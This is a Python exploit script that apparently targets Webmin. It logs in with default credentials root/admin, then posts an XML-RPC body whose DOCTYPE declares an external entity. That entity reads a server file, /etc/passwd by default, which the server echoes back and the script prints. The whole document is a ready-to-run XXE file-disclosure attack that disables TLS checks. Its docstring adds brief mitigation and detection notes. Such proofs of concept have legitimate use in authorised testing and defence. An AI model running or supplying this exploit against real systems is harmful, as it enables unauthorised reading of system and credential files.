import base64
import sys
import requests
import argparse
from urllib3 import disable_warnings
# Silence urllib3 warnings for the whole run: every requests.post below passes
# verify=False, which would otherwise emit an InsecureRequestWarning per call.
disable_warnings()
def cve(ip: str, port: int, user: str, password: str, file: str) -> None:
    """Log in to the target's web UI, then post an XML-RPC body whose DOCTYPE
    declares an external entity for *file* and print what the server echoes.

    Two HTTP requests are made, both with TLS certificate verification
    disabled (``verify=False``):

    1. ``POST /session_login.cgi`` with form credentials. The login is treated
       as successful only if the reply is a 302 carrying a ``sid`` cookie;
       otherwise the function prints nothing and returns.
    2. ``POST /xmlrpc.cgi`` with HTTP Basic auth, the session cookie and an
       XML body containing ``<!ENTITY file SYSTEM "file:<file>">`` used as the
       ``methodName``. Presumably the server's "module does not exist" error
       echoes the expanded entity back — that is what the scraping below
       relies on (not verifiable from this file).

    Args:
        ip: Host used to build ``https://<ip>:<port>``.
        port: TCP port; stringified when the URL is built.
        user: Username sent in the login form and in the Basic auth header.
        password: Password sent in the login form and in the Basic auth header.
        file: Path interpolated, unescaped, into the ``file:`` entity URI.

    Returns:
        None. Output is written to stdout only.

    Server-side mitigation: disable DTD / external entity resolution in the
    XML-RPC parser. Detection: a POST to ``/xmlrpc.cgi`` whose body contains a
    ``<!DOCTYPE`` with a ``SYSTEM`` entity, preceded by a ``testing=1`` cookie
    on ``/session_login.cgi``.
    """
    data = {
        "page": "%2F",
        "user": user,
        "pass": password
    }
    url = "https://" + ip + ":" + str(port)
    # Step 1: form login. Redirects are not followed so the 302 and its
    # Set-Cookie headers are inspected directly.
    r = requests.post(url + "/session_login.cgi", data=data, cookies={"testing": "1"}, verify=False, allow_redirects=False)
    r.close()
    # Only a 302 that sets a "sid" cookie counts as a successful login.
    if r and r.status_code == 302 and "sid" in r.cookies.get_dict().keys():
        sid = r.cookies.get_dict().get("sid")
        cookie = {
            "redirect": str(1),
            "testing": str(1),
            "sid": sid
        }
        vulnerable_url = url + "/xmlrpc.cgi"
        headers = {
            # Same credentials again, this time as HTTP Basic auth.
            'Authorization': "Basic %s" % base64.b64encode((user + ":" + password).encode('ascii')).decode(),
            # 'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
            'Content-Type': "application/x-www-form-urlencoded",
        }
        # Step 2: the XML body. The internal DTD subset declares an external
        # entity with a file: URI; *file* is concatenated in without escaping.
        payload = '<?xml version="1.0" encoding="utf-8"?> ' \
            '<!DOCTYPE methodCall [ <!ENTITY file SYSTEM "file:' + file + '"> ]> <methodCall> <methodName>&file;</methodName> </methodCall>'
        r = requests.post(url=vulnerable_url, headers=headers, data=payload, verify=False, cookies=cookie)
        r.close()
        # Response scraping, in three fallbacks:
        #   1. text between "<string>Webmin module " and "does not exist</string>";
        #   2. the <base64>…</base64> body, decoded, then the text between
        #      "Webmin module ip\t" and "does not exist";
        #   3. the decoded <base64> body as a whole;
        # and finally the raw response text if all of the above fail.
        # NOTE: the two bare `except:` clauses catch *everything* (including
        # KeyboardInterrupt and SystemExit), not just IndexError/decode errors.
        try:
            print(r.text.split("<string>Webmin module ")[1].split("does not exist</string>")[0])
        except IndexError:
            try:
                print(base64.b64decode(r.text.split("<base64>")[1].split("</base64>")[0]).decode().split("Webmin module ip\t")[1].split("does not exist")[0])
            except:
                try:
                    print(base64.b64decode(r.text.split("<base64>")[1].split("</base64>")[0]).decode())
                except:
                    print(r.text)
# Command-line entry point. Each flag maps 1:1 onto a parameter of cve();
# cve() is called at import time, so this module is a script, not a library.
parser = argparse.ArgumentParser()
parser.add_argument("--ip", type=str, required=True, help="Server IP Address")
# Optional flags share one shape (name, type, default), so declare them in bulk.
for flag, kind, fallback in (
    ("--port", int, 10000),
    ("--user", str, "root"),
    ("--password", str, "admin"),
    ("--file", str, "/etc/passwd"),
):
    parser.add_argument(flag, type=kind, default=fallback)
options = parser.parse_args(args=sys.argv[1:])
cve(options.ip, options.port, options.user, options.password, options.file)